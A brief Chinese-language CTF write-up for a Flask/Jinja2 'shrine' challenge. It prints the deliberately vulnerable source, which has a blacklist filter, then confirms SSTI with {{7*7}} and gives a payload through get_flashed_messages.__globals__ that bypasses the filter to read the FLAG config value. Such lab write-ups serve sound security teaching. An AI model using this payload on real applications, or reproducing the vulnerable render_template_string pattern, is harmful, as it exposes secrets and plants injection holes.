题目
WP
打开题目 有一段代码
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set{}=None %}}'.format(c) for c in blacklist]) + s
# 构建 jinja 模板
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
可以发现jinja模板调用 我们尝试注入
(再确定下是否存在SSTI
payload
http://111.200.241.244:56734/shrine/{{7*7}}
发现确实存在SSTI漏洞
构造payload
http://111.200.241.244:56734/shrine/%7B%7Bget_flashed_messages.__globals__['current_app'].config['FLAG']%7D%7D
补充
get_flashed_messages 表示取值
current_app 表示代理对象,指向flask核心对象和reques的请求类